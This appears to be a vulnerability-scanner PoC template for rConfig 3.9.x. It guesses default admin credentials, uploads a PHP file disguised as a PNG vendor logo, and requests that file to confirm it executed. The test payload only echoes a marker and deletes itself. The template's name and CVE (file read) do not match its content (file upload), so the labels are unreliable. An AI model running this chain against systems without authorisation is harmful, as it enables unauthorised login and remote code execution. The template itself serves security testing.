name: poc-yaml-rconfig-ajaxgetfilebypath-cve-2022-44384-fileread
binding: 2b976499-8288-45d8-9be5-5eb18fd9f61d
manual: true
detail:
    author: Xz
    links:
        - https://www.exploit-db.com/exploits/49783
    vulnerability:
        id: CT-515956
        level: high
    description: rConfig 3.9.x 文件上传
    check_action: 需要登录认证user=admin&pass=admin&sublogin=1
    warning: 该脚本会上传文件产生一个临时的无害文件，同时能够执行自删除逻辑，但是可能删除不成功
transport: http
set:
    r1: randomLowercase(20)
    r2: randomLowercase(20)
    rboundary: randomLowercase(8)
payloads:
    payloads:
        p1:
            username: |
                "admin"
            password: |
                "123"
        p2:
            username: |
                "admin"
            password: |
                "admin"
        p3:
            username: |
                "admin"
            password: |
                "123456"
        p4:
            username: |
                "admin"
            password: |
                "admin123"
        p5:
            username: |
                "root"
            password: |
                "root"
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /lib/crud/userprocess.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: user={{username}}&pass={{password}}&sublogin=1
            follow_redirects: false
        expression: response.status == 302
    r1:
        request:
            cache: true
            method: POST
            path: /lib/crud/vendors.crud.php
            headers:
                Content-Type: multipart/form-data; boundary=---------------------------{{rboundary}}
            body: |
                -----------------------------{{rboundary}}
                Content-Disposition: form-data; name="vendorName"

                thisisrce
                -----------------------------{{rboundary}}
                Content-Disposition: form-data; name="vendorLogo"; filename="{{r1}}.php"
                Content-Type: image/png

                <?php echo "{{r2}}"; unlink(__FILE__); ?>
                -----------------------------{{rboundary}}
                Content-Disposition: form-data; name="add"

                add
                -----------------------------{{rboundary}}
                Content-Disposition: form-data; name="editid"

                -----------------------------{{rboundary}}--
            follow_redirects: false
        expression: response.status == 302
    r2:
        request:
            cache: true
            method: GET
            path: /images/vendor/{{r1}}.php
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(bytes(r2))
expression: r0() && r1() && r2()
